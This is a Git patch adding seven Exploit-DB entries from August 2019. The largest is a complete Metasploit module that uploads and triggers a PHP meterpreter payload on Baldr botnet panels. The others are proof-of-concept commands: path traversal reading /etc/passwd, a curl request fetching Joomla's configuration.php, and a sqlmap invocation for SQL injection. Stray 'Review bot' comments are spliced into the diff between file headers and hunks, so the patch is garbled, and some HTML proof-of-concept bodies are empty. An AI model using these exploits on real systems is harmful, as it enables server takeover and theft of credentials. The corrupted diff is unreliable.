From d82ffc9cd0e25938ab9a16c806fb574bcd631a45 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 9 Aug 2019 05:02:23 +0000
Subject: [PATCH] DB: 2019-08-09
7 changes to exploits/shellcodes
Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting
Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)
Aptana Jaxer 1.0.3.4547 - Local File inclusion
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download
Adive Framework 2.0.7 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection
---
 exploits/multiple/webapps/47214.txt | 14 ++
 exploits/php/remote/47215.rb | 242 ++++++++++++++++++++++++++++
 exploits/php/webapps/47212.txt | 16 ++
 exploits/php/webapps/47213.txt | 18 +++
 exploits/php/webapps/47216.txt | 51 ++++++
 exploits/php/webapps/47217.txt | 33 ++++
 exploits/php/webapps/47218.txt | 44 +++++
 files_exploits.csv | 7 +
 8 files changed, 425 insertions(+)
 create mode 100644 exploits/multiple/webapps/47214.txt
 create mode 100755 exploits/php/remote/47215.rb
 create mode 100644 exploits/php/webapps/47212.txt
 create mode 100644 exploits/php/webapps/47213.txt
 create mode 100644 exploits/php/webapps/47216.txt
 create mode 100644 exploits/php/webapps/47217.txt
 create mode 100644 exploits/php/webapps/47218.txt
diff --git a/exploits/multiple/webapps/47214.txt b/exploits/multiple/webapps/47214.txt
new file mode 100644
index 000000000..0e72ba7fe
--- /dev/null
+++ b/exploits/multiple/webapps/47214.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Aptana Jaxer Remote Local File inclusion
+# Date: 8/8/2019
+# Exploit Author: Steph Jensen
+# Vendor Homepage:
+[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
+# Version: 1.0.3.4547
+# Tested on: Linux
+# CVE : CVE-2019-14312
+
+Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.
+
+To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server.
+
+PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
\ No newline at end of file
diff --git a/exploits/php/remote/47215.rb b/exploits/php/remote/47215.rb
new file mode 100755
index 000000000..993fc83d3
--- /dev/null
+++ b/exploits/php/remote/47215.rb
@@ -0,0 +1,242 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/http' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Baldr Botnet Panel Shell Upload Exploit", + 'Description' => %q{ + This module exploits the file upload vulnerability of baldr malware panel. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ege Balcı ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://prodaft.com'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'WfsDelay' => 5, + }, + 'Platform' => ['php'], + 'Arch' => [ ARCH_PHP], + 'Targets' => + [ + ['Auto', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ], + ['Baldr <= v2.0', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ], + ['Baldr v2.2', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ], + ['Baldr v3.0 & v3.1', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 19 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']), + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php") + ) + + ver = '' + + if res.code == 200 + if res.body.include?('~;~') + targets[3] = targets[0] + #target = targets[3] + ver = '>= v3.0' + elsif res.body.include?(';') + #target = targets[2] + targets[2] = targets[0] + ver = 'v2.2' + elsif res.body.size < 4 + targets[1] = targets[0] + #target = targets[1] + ver = '<= 
v2.0' + else + Exploit::CheckCode::Safe + end + print_status("Baldr verison: #{ver}") + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + + name = '.'+Rex::Text.rand_text_alpha(4) + files = + [ + {data: payload.encoded, fname: "#{name}.php"} + ] + zip = Msf::Util::EXE.to_zip(files) + hwid = Rex::Text.rand_text_alpha(8).upcase + + if targets[0] + check + end + + + case target + when targets[3] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php")} + ) + key = res.body.to_s.split('~;~')[0] + print_good("Key: #{key}") + + data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0" + data = xor(data,key) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'data' => data.to_s + } + ) + + if res.code == 200 + print_good("Bot successfully registered.") + else + print_error("New bot register failed !") + return false + end + + data = xor(zip.to_s,key) + form = Rex::MIME::Message.new + form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'ctype' => "multipart/form-data; boundary=#{form.bound}", + 'data' => form.to_s + ) + if res && (res.code == 200 ||res.code == 100) + print_good("Payload uploaded to /logs/#{hwid}/#{name}.php") + else + print_error("Server responded with code #{res.code}") if res + print_error("Failed to upload payload.") + return false + end + + when targets[2] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php")} + ) + key = res.body.to_s.split(';')[0] + print_good("Key: #{key}") + data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***" + data << zip.to_s + + result = "" + codepoints = 
data.each_codepoint.to_a + codepoints.each_index do |i| + result += (codepoints[i] ^ key[i % key.size].ord).chr + end + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'data' => result.to_s + ) + if res && (res.code == 200 ||res.code == 100) + print_good("Payload uploaded to /logs/#{hwid}/#{name}.php") + else + print_error("Server responded with code #{res.code}") if res + print_error("Failed to upload payload.") + return false + end + else + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'data' => zip.to_s, + 'encode_params' => true, + 'vars_get' => { + 'hwid' => hwid, + 'os' => 'Windows 7 x64', + 'cookie' => '0', + 'pswd' => '0', + 'credit' => '0', + 'wallet' => '0', + 'file' => '1', + 'autofill' => '0', + 'version' => 'v2.0' + } + ) + + if res && (res.code == 200 ||res.code == 100) + print_good("Payload uploaded to /logs/#{hwid}/#{name}.php") + else + print_error("Server responded with code #{res.code}") if res + print_error("Failed to upload payload.") + return false + end + end + + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3 + ) + + print_good("Payload successfully triggered !") + end + + def xor(data, key) + result = "" + codepoints = data.each_codepoint.to_a + codepoints.each_index do |i| + result += (codepoints[i] ^ key[i % key.size].ord).chr + end + return result + end + + +end \ No newline at end of file diff --git a/exploits/php/webapps/47212.txt b/exploits/php/webapps/47212.txt new file mode 100644 index 000000000..361afcae2 --- /dev/null +++ b/exploits/php/webapps/47212.txt 
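Review bot: `check` never reports Safe for a 200 response whose body matches none of the three signatures: the `Exploit::CheckCode::Safe` in the inner `else` is a discarded expression, so execution falls through to `print_status` and the method returns `Exploit::CheckCode::Vulnerable` with an empty version string. `res.code` is also read without a nil guard, so a connection failure raises instead of reporting. Suggested lines: `return Exploit::CheckCode::Unknown unless res`, `return Exploit::CheckCode::Safe unless res.code == 200`, and `return Exploit::CheckCode::Safe` in the inner `else`. The same fall-through matters in `exploit`, which calls `check` but discards its result and therefore proceeds to the default branch on any 200; the status message also misspells "version" as "verison".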
@@ -0,0 +1,16 @@
+# Exploit Title: [title]
+# Date: [2019 08 06]
+# Exploit Author: [Greg.Priest]
+# Vendor Homepage: [https://open-school.org/]
+# Software Link: []
+# Version: [Open-School 3.0/Community Edition 2.3]
+# Tested on: [Windows/Linux ]
+# CVE : [CVE-2019-14696]
+
+
+Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.
+
+/index.php?r=students/guardians/create&id=1[inject JavaScript Code]
+
+Example:
+/index.php?r=students/guardians/create&id=1
\ No newline at end of file
diff --git a/exploits/php/webapps/47213.txt b/exploits/php/webapps/47213.txt
new file mode 100644
index 000000000..9af44893f
--- /dev/null
+++ b/exploits/php/webapps/47213.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: August 8, 2019
+# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
+# Tested Version: 1.0
+# Tested on: Parrot OS
+
+
+# PoC:
+
+
+
+
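Review bot: The header still carries the template placeholder `# Exploit Title: [title]` and an empty `# Software Link: []`, so the file does not identify itself; the title used for it in the files_exploits.csv entry of this same commit would fit: `# Exploit Title: Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting`. The other header fields keep the template's square brackets around filled-in values (`[2019 08 06]`, `[Greg.Priest]`), which can be dropped for consistency with the other advisories in the commit.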
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/47216.txt b/exploits/php/webapps/47216.txt
new file mode 100644
index 000000000..837bd897d
--- /dev/null
+++ b/exploits/php/webapps/47216.txt
@@ -0,0 +1,51 @@
+#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 08.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: http://joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 1411 in file admin/models/ticket.php
+
+ 1382 function getDownloadAttachmentByName($file_name,$id){
+ 1383 if(empty($file_name)) return false;
+ 1384 if(!is_numeric($id)) return false;
+ 1385 $db = JFactory::getDbo();
+ 1386 $filename = str_replace(' ', '_',$file_name);
+ 1387 $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
+ 1388 $db->setQuery($query);
+ 1389 $foldername = $db->loadResult();
+ 1390
+ 1391 $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
+ 1392 $base = JPATH_BASE;
+ 1393 if(JFactory::getApplication()->isAdmin()){
+ 1394 $base = substr($base, 0, strlen($base) - 14); //remove administrator
+ 1395 }
+ 1396 $path = $base.'/'.$datadirectory;
+ 1397 $path = $path . '/attachmentdata';
+ 1398 $path = $path . '/ticket/' . $foldername;
+ 1399 $file = $path . '/' . $filename;
+ 1400
+ 1401 header('Content-Description: File Transfer');
+ 1402 header('Content-Type: application/octet-stream');
+ 1403 header('Content-Disposition: attachment; filename=' . basename($file));
+ 1404 header('Content-Transfer-Encoding: binary');
+ 1405 header('Expires: 0');
+ 1406 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+ 1407 header('Pragma: public');
+ 1408 header('Content-Length: ' . filesize($file));
+ 1409 //ob_clean();
+ 1410 flush();
+ 1411 readfile($file); //!!!
+ 1412 exit();
+ 1413 exit;
+ 1414 }
+
+#####################################
+#PoC:
+#####################################
+$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"
\ No newline at end of file
diff --git a/exploits/php/webapps/47217.txt b/exploits/php/webapps/47217.txt
new file mode 100644
index 000000000..fea2705a9
--- /dev/null
+++ b/exploits/php/webapps/47217.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
+# Date:02/08/2019.
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://adive.es
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.7
+# Tested on: Windows and Kali linux
+# CVE :2019-14346
+
+# 1. Technical Description:
+# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
+#Request Forgery vulnerability, an attacker could change any user
+password.
+
+# 2. Proof Of Concept (CODE):
+
+
+
+
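Review bot: The write-up points at line 1411 (`readfile`) as the flaw, but the missing check is earlier in the quoted snippet: `$filename` is built at 1386 by replacing spaces only and is joined to `$path` at 1399, so a reader assessing the bug or a candidate patch has to infer the root cause. One sentence after `Vulnerable code is in line 1411 ...` would make it explicit, e.g. `The name parameter reaches the path at line 1399 without basename() or a realpath containment check against the attachment directory.` The advisory also lists no fixed version or vendor fix reference, which is what a defender needs to decide whether 1.1.5 is the last affected release.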
+
+
+
+
+
+
+
+
+
+
+# 3. References:
+# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
+# https://imgur.com/apuZa9q
\ No newline at end of file
diff --git a/exploits/php/webapps/47218.txt b/exploits/php/webapps/47218.txt
new file mode 100644
index 000000000..a2d498e5f
--- /dev/null
+++ b/exploits/php/webapps/47218.txt
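Review bot: The `# CVE :2019-14346` header omits the `CVE-` prefix that the other advisories in this commit use (`# CVE : CVE-2019-14312`, `# CVE : [CVE-2019-14696]`), which will defeat tooling that greps the header for CVE ids; write it as `# CVE : CVE-2019-14346`, matching the id in the hackpuntes reference URL. The three-line technical description is also inconsistently commented (`#Request Forgery ...` without a space, `password.` with no `#` at all), so a parser treating `#` lines as header metadata sees a stray bare line.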
@@ -0,0 +1,44 @@
+#Exploit Title: Joomla! component com_jssupportticket - SQL Injection
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 08.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 441 in file admin/models/userfields.php
+
+ 439 function dataForDepandantField( $val , $childfield){
+ 440 $db = $this->getDBO();
+ 441 $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!!
+ 442 $db->setQuery($query);
+ 443 $data = $db->loadObject();
+ 444 $decoded_data = json_decode($data->userfieldparams);
+ 445 $comboOptions = array();
+ 446 $flag = 0;
+ 447 foreach ($decoded_data as $key => $value) {
+ 448 if($key == $val){
+ 449 for ($i=0; $i < count($value) ; $i++) {
+ 450 if($flag == 0){
+ 451 $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle);
+ 452 }
+ 453 $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]);
+ 454 $flag = 1;
+ 455 }
+ 456 }
+ 457 }
+ 458 $jsFunction = '';
+ 459 if ($data->depandant_field != null) {
+ 460 $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";
+ 461 }
+ 462 $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
+ 463 return $html;
+ 464 }
+
+#####################################
+#PoC:
+#####################################
+$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql
\ No newline at end of file
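Review bot: Line 441 is the injection point, but the quoted snippet shows a second defect the write-up does not mention: `loadObject()` at 443 can return null when no row matches, and 444 then reads `$data->userfieldparams` unconditionally, so an unmatched `child` value produces PHP notices instead of a clean error. The advisory would serve defenders better if it stated the fix shape for the query, i.e. a quoted value instead of string concatenation, `WHERE field = " . $db->quote($childfield)`, and named a fixed version. As with 47216 in this commit, no patched release is listed.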
diff --git a/files_exploits.csv b/files_exploits.csv
index 2b1833f18..7dd85753f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17594,6 +17594,7 @@ id,file,description,date,author,type,platform,port
 47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379
 47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows,
 47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple,
+47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41579,3 +41580,9 @@ id,file,description,date,author,type,platform,port
 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
 47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
 47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80
+47212,exploits/php/webapps/47212.txt,"Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting",2019-08-08,Greg.Priest,webapps,php,80
+47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80
+47214,exploits/multiple/webapps/47214.txt,"Aptana Jaxer 1.0.3.4547 - Local File inclusion",2019-08-08,"Steph Jensen",webapps,multiple,
+47216,exploits/php/webapps/47216.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download",2019-08-08,qw3rTyTy,webapps,php,80
+47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80
+47218,exploits/php/webapps/47218.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection",2019-08-08,qw3rTyTy,webapps,php,80